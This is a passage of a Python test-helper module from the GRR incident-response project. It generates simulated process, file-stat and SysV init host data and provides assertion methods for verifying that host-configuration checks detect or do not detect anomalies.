      raise test_lib.Error("All lists are not of the same length.")
    host_data = self.SetKnowledgeBase()
    for artifact, sources, parser in zip(artifact_list, sources_list,
                                         parser_list):
      if parser is None:
        # No parser: store the sources verbatim as raw artifact data.
        host_data[artifact] = self.SetArtifactData(
            raw=sources, results=host_data.get(artifact))
      else:
        host_data = self._AddToHostData(host_data, artifact, sources, parser)
    return self.RunChecks(host_data)

  def GenProcessData(self, processes):
    """Create some process-based host data.

    Args:
      processes: an iterable of (name, pid, cmdline) tuples.
    """
    host_data = self.SetKnowledgeBase()
    data = []
    for (name, pid, cmdline) in processes:
      data.append(rdf_client.Process(name=name, pid=pid, cmdline=cmdline))
    host_data["ListProcessesGrr"] = self.SetArtifactData(parsed=data)
    return host_data

  @classmethod
  def _GenFileData(cls, paths, data, stats=None, files=None, modes=None):
    """Generate a tuple of list of stats and list of file contents.

    Appends to the stats/files accumulators when provided, so callers can
    build the lists up incrementally across multiple invocations.
    """
    if stats is None:
      stats = []
    if files is None:
      files = []
    if modes is None:
      modes = {}
    # Fill in default ownership/permissions for any key the caller omitted.
    modes.setdefault("st_uid", 0)
    modes.setdefault("st_gid", 0)
    modes.setdefault("st_mode", 0o0100644)
    for path in paths:
      p = rdf_paths.PathSpec(path=path, pathtype="OS")
      stats.append(rdf_client.StatEntry(pathspec=p, **modes))
    for val in data:
      files.append(StringIO.StringIO(val))
    return stats, files

  @classmethod
  def GenStatFileData(cls, data, modes=None):
    """Gen a tuple of list of stats and list of file contents from a dict."""
    paths = []
    contents = []
    for path, content in data.iteritems():
      paths.append(path)
      contents.append(content)
    return cls._GenFileData(paths, contents, modes=modes)

  def GenFileData(self, artifact, data, parser=None, modes=None, include=None):
    """Create a set of host_data results based on file parser results.

    Creates a host data result populated with a knowledge base, then processes
    each piece of host data as if it were file results using a parser. Specific
    stat values can be provided to the parser, if required, so that permissions,
    ownership and file types can be defined.

    Args:
      artifact: The artifact name that generated data will be mapped to.
      data: A dictionary of pathnames and data strings. The data strings are
        converted into file objects for the parser.
      parser: The FileParser that processes the data (and stats)
      modes: A dictionary of pathnames and stat values. Stat values are a dict
        of {st_uid: int, st_gid: int, st_mode: oct} entries.
      include: A list of pathnames to include in processing. If not provided,
        all paths are parsed.

    Returns:
      the host_data map populated with a knowledge base and artifact data.

    Raises:
      test_lib.Error: if no parser was supplied.
    """
    host_data = self.SetKnowledgeBase()
    if not parser:
      raise test_lib.Error("Test method requires an initialized parser.")
    if not modes:
      modes = {}
    kb = host_data["KnowledgeBase"]
    files = []
    rdfs = []
    stats = []
    for path in data:
      if include and path not in include:
        continue
      file_modes = modes.get(path, {})
      stats, files = self._GenFileData([path], [data[path]], stats=stats,
                                       files=files, modes=file_modes)
    if parser.process_together:
      rdfs = list(parser.ParseMultiple(stats, files, kb))
    else:
      for stat, file_obj in zip(stats, files):
        # Make sure the parser result is iterable.
        rslt = parser.Parse(stat, file_obj, kb) or []
        rdfs.extend(rslt)
    anomaly = [a for a in rdfs if isinstance(a, rdf_anomaly.Anomaly)]
    parsed = [r for r in rdfs if not isinstance(r, rdf_anomaly.Anomaly)]
    host_data[artifact] = self.SetArtifactData(
        parsed=parsed, anomaly=anomaly, raw=stats)
    return host_data

  def GenSysVInitData(self, links):
    """Create some Sys V init host data."""
    # st_mode 41471 (0o120777) marks each entry as a symlink, which is what
    # the SysV init parser expects for rc.d service links.
    return self.GenFileData(artifact="LinuxServices",
                            data={x: "" for x in links},
                            parser=linux_service_parser.LinuxSysVInitParser(),
                            modes={x: {"st_mode": 41471} for x in links})

  # The assert methods

  def assertRanChecks(self, check_ids, results):
    """Tests that the specified checks were run."""
    self.assertTrue(set(check_ids).issubset(set(results.keys())))

  def assertChecksNotRun(self, check_ids, results):
    """Tests that the specified checks were not run."""
    self.assertFalse(set(check_ids).intersection(set(results.keys())))

  def assertResultEqual(self, rslt1, rslt2):
    """Tests whether two check results are identical."""
    # Build a map of anomaly symptoms to findings.
    if rslt1.check_id != rslt2.check_id:
      self.fail("Check IDs differ: %s vs %s" % (rslt1.check_id, rslt2.check_id))
    # Quick check to see if anomaly counts are the same and they have the same
    # ordering, using symptoms as a measure.
    rslt1_anoms = {}
    for a in rslt1.anomaly:
      anoms = rslt1_anoms.setdefault(a.symptom, [])
      anoms.extend(a.finding)
    rslt2_anoms = {}
    for a in rslt2.anomaly:
      anoms = rslt2_anoms.setdefault(a.symptom, [])
      anoms.extend(a.finding)
    self.assertItemsEqual(rslt1_anoms, rslt2_anoms,
                          "Results have different anomaly items.:\n%s\n%s" %
                          (rslt1_anoms.keys(), rslt2_anoms.keys()))
    # Now check that the anomalies are the same, modulo newlines.
    for symptom, findings in rslt1_anoms.iteritems():
      rslt1_found = [f.strip() for f in findings]
      rslt2_found = [f.strip() for f in rslt2_anoms[symptom]]
      self.assertItemsEqual(rslt1_found, rslt2_found)

  def assertIsCheckIdResult(self, rslt, expected):
    """Tests if a check has the expected check_id."""
    self.assertIsInstance(rslt, checks.CheckResult)
    self.assertEqual(expected, rslt.check_id)

  def assertValidCheck(self, check_spec):
    """Tests if a check definition generates structural errors."""
    errors = self.GetCheckErrors(check_spec)
    if errors:
      self.fail("\n".join(errors))

  def assertValidCheckFile(self, path):
    """Tests whether a check definition has a valid configuration."""
    # Figure out the relative path of the check files.
    prefix = os.path.commonprefix(config_lib.CONFIG["Checks.config_dir"])
    relpath = os.path.relpath(path, prefix)
    # If the config can't load fail immediately.
    try:
      configs = checks.LoadConfigsFromFile(path)
    except yaml.error.YAMLError as e:
      self.fail("File %s could not be parsed: %s\n" % (relpath, e))
    # Otherwise, check all the configs and pass/fail at the end.
    errors = collections.OrderedDict()
    for check_id, check_spec in configs.iteritems():
      check_errors = self.GetCheckErrors(check_spec)
      if check_errors:
        msg = errors.setdefault(relpath, ["check_id: %s" % check_id])
        msg.append(check_errors)
    if errors:
      message = ""
      for k, v in errors.iteritems():
        message += "File %s errors:\n" % k
        message += "  %s\n" % v[0]
        for err in v[1]:
          message += "  %s\n" % err
      self.fail(message)

  def _HasSymptom(self, anomalies, sym):
    """Tests if one or more anomalies contain the expected symptom string."""
    if sym is None:
      # No symptom specified: vacuously satisfied.
      return True
    rslts = {rslt.symptom: rslt for rslt in anomalies}
    rslt = rslts.get(sym)
    # Anomalies evaluate false if there are no finding strings.
    self.assertTrue(rslt is not None,
                    "Didn't get expected symptom string '%s' in '%s'" %
                    (sym, ",".join(rslts)))

  def _GetFindings(self, anomalies, sym):
    """Generate a set of findings from anomalies that match the symptom."""
    result = set()
    for anomaly in anomalies:
      if anomaly.symptom == sym:
        result.update(set(anomaly.finding))
    return result

  def _MatchFindings(self, expected, found):
    """Check that every expected finding is a substring of a found finding."""
    matched_so_far = set()
    for finding_str in expected:
      no_match = True
      for found_str in found:
        if finding_str in found_str:
          matched_so_far.add(found_str)
          no_match = False
          break
      if no_match:
        return False
    # If we got here, all expected's match at least one item.
    # Now check if every item in found was matched at least once.
    # If so, everything is as expected, If not, Badness.
    # NOTE(review): falls through and implicitly returns None (falsy) when
    # `found` contains unmatched items — callers treat that as failure.
    if not matched_so_far.symmetric_difference(found):
      return True

  def assertCheckDetectedAnom(self, check_id, results, sym=None, findings=None):
    """Assert a check was performed and specific anomalies were found.

    Results may contain multiple anomalies. The check will hold true if any
    one of them matches. As some results can contain multiple anomalies we
    will need to make sure the right anomalies are selected.

    If an symptom is provided, look for anomalies that matches the
    expression string and use those. Otherwise, all anomalies in the
    check should be used.

    If finding strings are provided, the check tests if the substring is present
    in the findings of the anomalies that are selected for testing. If the
    finding results can have variable ordering, use a substring that will remain
    constant for each finding.

    Args:
      check_id: The check_id as a string.
      results: A dictionary of check results, mapped to check_ids
      sym: An symptom string. This is the "title" of an advisory.
      findings: A list of finding strings that should be present in the findings
        of the selected anomaly.

    Returns:
      True if tests have succeeded and no further processing is required.
    """
    chk = results.get(check_id)
    self.assertTrue(chk is not None, "check %s did not run" % check_id)
    # Checks return true if there were anomalies.
    self.assertTrue(chk, "check %s did not generate anomalies" % check_id)
    # If sym or results are passed as args, look for anomalies with these
    # values.
    self._HasSymptom(chk.anomaly, sym)
    if findings is None:
      # We are not expecting to match on findings, so skip checking them.
      return True
    findings = set(findings)
    found = self._GetFindings(chk.anomaly, sym)
    if self._MatchFindings(findings, found):
      # Everything matches, and nothing unexpected, so all is good.
      return True
    # If we have made it here, we have the expected symptom but
    # the findings didn't match up.
    others = "\n".join([str(a) for a in chk.anomaly])
    self.fail("Findings don't match for symptom '%s':\nExpected:\n %s\n"
              "Got:\n %s\nFrom:\n%s"
              % (sym, ", ".join(findings), ", ".join(found), others))

  def assertCheckUndetected(self, check_id, results):
    """Assert a check_id was performed, and resulted in no anomalies."""
    if not isinstance(results, collections.Mapping):
      self.fail("Invalid arg, %s should be dict-like.\n" % type(results))
    if check_id not in results:
      self.fail("Check %s was not performed.\n" % check_id)
    # A check result will evaluate as True if it contains an anomaly.
    if results.get(check_id):
      self.fail("Check %s unexpectedly produced an anomaly.\nGot: %s\n"
                % (check_id, results.get(check_id).anomaly))

  def assertChecksUndetected(self, check_ids, results):
    """Assert multiple check_ids were performed & they produced no anomalies."""
    for check_id in check_ids:
      self.assertCheckUndetected(check_id, results)
| darrenbilby/grr | lib/checks/checks_test_lib.py | Python | apache-2.0 | 19,268 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.